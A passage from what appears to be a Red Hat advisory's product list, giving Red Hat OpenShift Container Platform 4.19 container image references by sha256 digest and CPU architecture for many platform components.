"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
